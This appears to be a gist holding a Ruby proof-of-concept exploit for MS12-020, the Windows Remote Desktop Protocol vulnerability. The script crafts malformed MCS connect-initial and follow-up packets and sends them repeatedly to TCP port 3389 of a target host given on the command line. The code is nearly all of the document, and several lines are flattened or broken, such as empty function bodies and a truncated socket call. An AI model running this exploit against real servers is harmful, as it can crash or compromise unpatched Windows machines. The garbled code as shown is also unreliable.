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Created August 24, 2013 23:16
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MS12-020 Remote Desktop Protocol (RDP) Remote Code Execution PoC (Ruby)
#!/usr/bin/env ruby
# ms12-020 PoC attempt
# NOTE: This was crafted based on a legit connection packet capture and reversing
# a packet capture of the leaked MAPP PoC.
# by Joshua J. Drake (jduck)
require 'socket'
def send_tpkt(sd, data)
def make_tpkt(data)
3, # version
0, # reserved
4 + data.length
].pack('CCn') + data
def make_x224(data)
[ data.length ].pack('C') + data
def make_rdp(type, flags, data)
[ type, flags, 4 + data.length ].pack('CCv') + data
host = ARGV.shift
sd =, 3389)
pkts1 = []
# craft connection request
rdp = make_rdp(1, 0, [ 0 ].pack('V'))
x224_1 = make_x224([
0xe0, # Connection request
0, # ??
0, # SRC-REF
0 # Class : Class 0
].pack('CnnC') + rdp)
pkts1 << make_tpkt(x224_1)
# craft connect-initial
x224_2 = make_x224([
0xf0, # Data / Class 0
0x80 # EOT: True / NR: 0
# mcsCi
target_params = ""+
#"\x02\x01\x00"+ # maxChannelIds
"\x02\x01\x22"+ # maxChannelIds
"\x02\x01\x0a"+ # maxUserIds
"\x02\x01\x00"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\xff\xff"+ # maxMCSPDUSize
"\x02\x01\x02" # protocolVersion
min_params = ""+
"\x02\x01\x01"+ # maxChannelIds
"\x02\x01\x01"+ # maxUserIds
"\x02\x01\x01"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\x04\x20"+ # maxMCSPDUSize
"\x02\x01\x02" # protocolVersion
max_params = ""+
"\x02\x02\xff\xff"+ # maxChannelIds
"\x02\x02\xfc\x17"+ # maxUserIds
"\x02\x02\xff\xff"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\xff\xff"+ # maxMCSPDUSize
"\x02\x01\x02" # protocolVersion
userdata = ""+
# gccCCrq
# clientCoreData
"\x01\xc0"+"\xd8\x00"+ # header (type, len)
"\x04\x00"+"\x08\x00"+ # version
"\x80\x02"+ # desktop width
"\xe0\x01"+ # desktop height
"\x01\xca"+ # color depth
"\x03\xaa"+ # SASSequence
"\x09\x04\x00\x00" + # keyboard layout
"\xce\x0e\x00\x00" + # client build number
# client name
"\x04\x00\x00\x00"+ # keyboard type
"\x00\x00\x00\x00"+ # kbd subType
"\x0c\x00\x00\x00"+ # kbd FuncKey
# imeFileName
"\x01\xca"+ # postBeta2ColorDepth
"\x01\x00"+ # clientProductId
"\x00\x00\x00\x00" + # serialNumber
"\x10\x00"+ # highColorDepth
"\x07\x00"+ # supportedColorDepths
"\x01\x00"+ # earlyCapabilityFlags
# clientDigProductId -poc has: "00000-000-0000000-00000"
"\x00"+ # connectionType
"\x00"+ # pad1octet
"\x00\x00\x00\x00"+ # serverSelectedProtocol
"\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
"\x0d\x00\x00\x00"+ # desktopPhysicalHeight
"\x00\x00\x00\x00"+ # reserved
# clientSecurityData
"\x02\xc0"+"\x0c\x00"+ # header (type, len)
"\x1b\x00\x00\x00"+ # encryptionMethods
"\x00\x00\x00\x00"+ # extEncryptionMethods
# clientNetworkData
"\x03\xc0"+"\x2c\x00"+ # header (type, len)
"\x03\x00\x00\x00"+ # channel count!
# channel 0
"rdpdr\x00\x00\x00"+ # name
"\x00\x00\x80\x80"+ # options
# channel 1
"cliprdr\x00"+ # name
"\x00\x00\xa0\xc0"+ # options
# channel 2
"rdpsnd\x00\x00"+ # name
"\x00\x00\x00\xc0" # options
# clientClusterData (not present)
# clientMonitorData (not present)
mcs_data = ""+
"\x04\x01\x01"+ # callingDomainSelector
"\x04\x01\x01"+ # calledDomainSelector
"\x01\x01\xff"+ # upwardFlag
"\x30" + [ target_params.length ].pack('C') + target_params +
"\x30" + [ min_params.length ].pack('C') + min_params +
"\x30" + [ max_params.length ].pack('C') + max_params +
# userData
"\x04\x82" + [ userdata.length ].pack('n') + userdata
mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n') # connect-initial (0x65 / 101), length
mcs << mcs_data
pkts1 << make_tpkt(x224_2 + mcs)
# send a special one?
#pkts1 << make_tpkt(x224_2 + "\x04\x01\x00\x01\x00")
# send more pkts! - based on poc
8.times {
pkts1 << make_tpkt(x224_2 + "\x28")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xea")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xeb")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xec")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xed")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xee")
pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf0")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf1")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf2")
#pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf3")
pkts1 << make_tpkt(x224_2 + "\x21\x80")
bigpkt = pkts1.join('')
20.times { |x|
puts "[*] Sending #{x + 1} ..."
send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")
#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x02")
#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x03")
#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x04")
# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
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